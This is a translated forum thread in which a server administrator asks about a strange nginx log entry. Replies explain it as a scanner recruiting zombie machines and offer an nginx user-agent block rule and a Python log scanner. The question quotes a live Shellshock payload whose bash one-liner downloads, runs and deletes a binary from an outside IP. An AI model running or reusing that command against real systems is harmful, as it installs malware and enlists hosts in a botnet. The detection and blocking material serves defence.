nginx - Questions about using user-agent to attack
世界只因有你 2017-05-16 17:10:16

Today I accidentally discovered a very strange log in the access.log of nginx on the company server:

61.136.82.154 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/mig http://37.1.202.6/mig;/usr/bin/wget http://37.1.202.6/mig -O /tmp/mig;chmod +x /tmp/mig;/tmp/mig;rm -rf /tmp/mig*\x22" "-"

The strange things are:

  1. It is using HTTP/1.0

  2. The user-agent is a script

I searched around the Internet and found no information about using user-agent to attack. Although I can get the script code by following the address in the log, my ability is limited and I cannot analyze its attack target.

If any experts have relevant information and experience, please share it with me. Thank you very much!

Addendum:

Under what configuration conditions of nginx will it parse the content in user-agent?


reply all(3)
阿神

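This should be an HTTP/1.0 User-Agent vulnerability. Your server may have had a script injected by the other party; they disguised a service as Apache on your machine, turned your server into a zombie machine, and manipulated it to carry out DDoS attacks. But I don't know whether nginx will execute this script.

You can look at the address from access.log, http://37.1.202.6/mig. You can see there is a file a: http://37.1.202.6/a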

滿天的星座

Injected by a scanner... The User-Agent will be parsed.

1. Install an application firewall
2. Configure Nginx

```
# Configure the rejected user_agent (case-insensitive regex match).
# Place this inside a server or location block.
if ($http_user_agent ~* 'curl') {
    return 403;
}
```
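A log check for the pattern in the question, as an added example that is not part of the original thread: it parses nginx access-log lines, undoes nginx's `\xXX` escaping, and flags request, referer or user-agent fields that contain the bash function-definition prefix `() {`. The sample lines, addresses and function names are constructed for illustration.

```python
import re

# nginx access-log line in the layout shown in the question (combined format).
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
FUNC_PREFIX_RE = re.compile(r'\(\)\s*\{')        # "() {" with optional whitespace
URL_RE = re.compile(r'https?://[^\s;"\'|&]+')    # download locations named in the payload
HEX_ESC_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')  # nginx writes '"' as \x22 in logs

# Constructed sample lines (documentation address ranges, not real hosts).
SAMPLE = [
    r'198.51.100.7 - - [07/Jan/2017:02:27:20 +0000] "GET / HTTP/1.1" 200 3770 '
    r'"-" "Mozilla/5.0 (X11; Linux x86_64)" "-"',
    r'203.0.113.9 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 '
    r'"-" "() { :;}; /bin/bash -c \x22curl -o /tmp/x http://192.0.2.10/x\x22" "-"',
]

def unescape(field):
    """Undo nginx log escaping so patterns match the header as it was sent."""
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), field)

def scan_line(line):
    """Return a finding dict if a client-controlled field carries the prefix."""
    m = LINE_RE.match(line)
    if not m:
        return None
    for name in ("request", "referer", "agent"):
        value = unescape(m.group(name))
        if FUNC_PREFIX_RE.search(value):
            return {
                "ip": m.group("ip"),
                "time": m.group("time"),
                "status": m.group("status"),
                "field": name,
                "urls": URL_RE.findall(value),  # indicators to check in egress logs
            }
    return None

def scan(lines):
    """Scan an iterable of log lines and return all findings."""
    return [f for f in map(scan_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A 200 status on such a line only means nginx served the requested path. The header is acted on only when something passes it as an environment variable to a vulnerable bash, for example a CGI script.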

过去多啦不再A梦

It's a Perl script whose purpose is to disguise itself as Apache.

Then it accepts instructions to do things... That's right, it's recruiting zombie machines.
